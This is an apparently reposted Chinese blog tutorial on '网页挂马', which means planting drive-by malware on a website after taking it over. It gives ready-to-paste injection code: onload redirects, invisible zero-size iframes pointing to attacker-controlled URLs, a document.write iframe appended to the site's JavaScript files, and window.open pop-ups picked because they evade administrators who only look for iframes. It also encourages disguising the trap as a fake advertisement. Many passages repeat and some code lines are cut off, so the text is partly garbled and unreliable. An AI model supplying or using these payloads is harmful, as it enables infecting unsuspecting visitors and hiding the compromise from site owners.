网页挂马
网页挂马指的是把一个***程序上传到一个网站里面然后用***生成器生一个网马,再上到空间里面!再加代码使得***在打开网页是运行!
网页挂马指的是把一个***程序上传到一个网站里面然后用***生成器生一个网马,再上到空间里面!再加代码使得***在打开网页是运行!
几种挂马的方式,给大家总结出来,希望能有所帮助。在***了一个站拿到了webshell的时候,最常见的挂站代码如下 :
(一)启动时加载一个网页:
CODE:<body οnlοad="window.location='网页***地址';"></body>
(二)加入一个隐藏框架:
CODE:
<html>
<iframe src=" [url]http://192.168.1.3/inc/joke.htm[/url]" width="0" height="0" frameborder="0"></iframe>
</html>
把以上代码插到对方网页代码中,那么下次别人浏览了那个站点就会自动转向_blank>[url]http://192.168.1.3/inc/joke.htm[/url]。而
(一)启动时加载一个网页:
CODE:<body οnlοad="window.location='网页***地址';"></body>
(二)加入一个隐藏框架:
CODE:
<html>
<iframe src=" [url]http://192.168.1.3/inc/joke.htm[/url]" width="0" height="0" frameborder="0"></iframe>
</html>
把以上代码插到对方网页代码中,那么下次别人浏览了那个站点就会自动转向_blank>[url]http://192.168.1.3/inc/joke.htm[/url]。而
_blank>[url]http://192.168.1.3/inc/joke.htm[/url]也就是我门的网页***了,那width="0" height="0"又是什么意思呢?width就是宽而height自然就
是高了。我们把它设置为0也就是不显示了,对方也就看不见我们的这个页面,***也就会被下载到本地。
(三)图片***:
CODE:<html>
<body>
<iframe src="网页***地址" width=0 height=0></iframe>
<img src="图片地址"></img>
</html>
(四)邮箱网页***:
这段代码加到页面最后面:
CODE:</html><iframe src="网页***地址" name="zhu" width ="0" height="0" frameborder="0"></html>
一般的办法是在一个地方写上<iframe src="muma.htm" width="0" height="0" frameborder="0"></iframe> 这样就可以访问muma的页面了
(五)JS方式
先找找主页里面是否有JS的脚本,找到script language="javascript" src="/xxxx.js"之类就成功了,接下来把这个JS下载下来,往里面加以下
(三)图片***:
CODE:<html>
<body>
<iframe src="网页***地址" width=0 height=0></iframe>
<img src="图片地址"></img>
</html>
(四)邮箱网页***:
这段代码加到页面最后面:
CODE:</html><iframe src="网页***地址" name="zhu" width ="0" height="0" frameborder="0"></html>
一般的办法是在一个地方写上<iframe src="muma.htm" width="0" height="0" frameborder="0"></iframe> 这样就可以访问muma的页面了
(五)JS方式
先找找主页里面是否有JS的脚本,找到script language="javascript" src="/xxxx.js"之类就成功了,接下来把这个JS下载下来,往里面加以下
代码(最好在原来的代码上,回车一行加上代码)
CODE:document.write('<IFRAME marginWidth=0 marginHeight=0 src="[url]http://www.cqhk.cn/ma.htm[/url]" frameBorder=0 width=0
CODE:document.write('<IFRAME marginWidth=0 marginHeight=0 src="[url]http://www.cqhk.cn/ma.htm[/url]" frameBorder=0 width=0
scrolling=no height=0 topmargin="0" leftmargin="0"></IFRAME>');
以上代码中的[url]http://www.cqhk.cn/ma.htm[/url],换成你自己的网页***的地址.
再把修改好的JS上传覆盖原来的JS,就可以了.
(六)script
另外,这一句同样不错,用script实现的。所以对于一般别人检查iframe来判断有无被挂马是一个突破
CODE:<script>
file://window.showModelessDialog("javascript:window.open('[url]http://www.cqhk.cn/index.htm
以上代码中的[url]http://www.cqhk.cn/ma.htm[/url],换成你自己的网页***的地址.
再把修改好的JS上传覆盖原来的JS,就可以了.
(六)script
另外,这一句同样不错,用script实现的。所以对于一般别人检查iframe来判断有无被挂马是一个突破
CODE:<script>
file://window.showModelessDialog("javascript:window.open('[url]http://www.cqhk.cn/index.htm
[/url]','k','top=3000,left=3000,width=0,height=0');
window.close();","n","scroll:0;status:0;help:0;resizable:0;dialogWidth:0px;dialogHeight:0px");
</script>
或者
CODE:<SCRIPT language=javascript>
window.open
window.close();","n","scroll:0;status:0;help:0;resizable:0;dialogWidth:0px;dialogHeight:0px");
</script>
或者
CODE:<SCRIPT language=javascript>
window.open
t=1");
</script>
打开网站的同时也就打开了我们的是不是比上面的那个隐蔽了些。如果粗心的管理员在搜索了iframe没结果后,放弃了检查这个页面,那你不
</script>
打开网站的同时也就打开了我们的是不是比上面的那个隐蔽了些。如果粗心的管理员在搜索了iframe没结果后,放弃了检查这个页面,那你不
是拣了大便宜了!这里我把width和height的值设置为1了,不错!就是1,因为我在用0测试了N次后,发现打开页面弹出我们的***页是满屏显
示的
其实我们还可以简单装饰一下那个页面的,让弹出一个我们伪造的广告,达到欺骗的效果!至于怎么伪装就看你自己发挥了。还有几种方法在
其实我们还可以简单装饰一下那个页面的,让弹出一个我们伪造的广告,达到欺骗的效果!至于怎么伪装就看你自己发挥了。还有几种方法在
这里就不一一列举了,flash***也很厉害的哦。
(七):
代码加进包含文件<!--#include file="conn.asp"-->
代码加进包含文件<!--#include file="conn.asp"-->
转载于:https://blog.51cto.com/12335/22461
4871
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
